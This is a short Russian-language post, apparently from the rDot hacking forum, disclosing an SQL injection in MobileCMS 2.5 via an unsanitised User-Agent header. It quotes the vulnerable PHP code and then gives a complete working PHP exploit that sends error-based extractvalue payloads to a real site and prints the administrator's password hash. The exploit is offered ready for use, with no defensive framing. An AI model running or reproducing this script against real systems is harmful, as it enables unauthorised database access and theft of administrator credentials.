RDot
(
https://rdot.org/forum/index.php)
- -
MobileCMS
(
https://rdot.org/forum/showthread.php?t=1916)
MobileCMS
SQLi
- Версия: 2.5
- Сайт: mobilecms.ru
- [path]/libraries/controller.php
PHP код:
// Добавление гостей в бд
if ($user_id == -1) {
$user_agent = $_SERVER['HTTP_USER_AGENT'];
// Проверяем наличие гостя в списке
if ($guest = $this->db->get_row("SELECT id FROM #__guests WHERE ip = '". $_SERVER['REMOTE_ADDR'] ."' AND user_agent = '". $user_agent ."'")) {
// Обновляем дату последнего посещения
$this->db->query("UPDATE #__guests SET
last_time = UNIX_TIMESTAMP()
WHERE id = '". $guest['id'] ."'
");
}
EXPL:
PHP код:
<?php
#by SeNaP for rDot.org 2012)
$site = "http://mobilecms.ru";
$admin_id = 1;
$hash = "";
$sql = array(
"' AND extractvalue(1,concat(0x3a,(select `password` from `a_users` where `user_id`={$admin_id} LIMIT 0,1 )))# ",
"' AND extractvalue(1,concat(0x3a,(select mid(`password`,32,1) from `a_users` where `user_id`={$admin_id} LIMIT 0,1 )))# "
);
$ch = curl_init($site);
for($i = 0; $i<2; $i++)
{
curl_setopt($ch, CURLOPT_USERAGENT, $sql[$i]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
preg_match("#XPATH syntax error: ':(.+)'#", $result, $res);
$hash.=$res[1];
}
curl_close($ch);
echo $hash;
?>
|
| Часовой пояс GMT +3, время: 17:42. |
|
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot
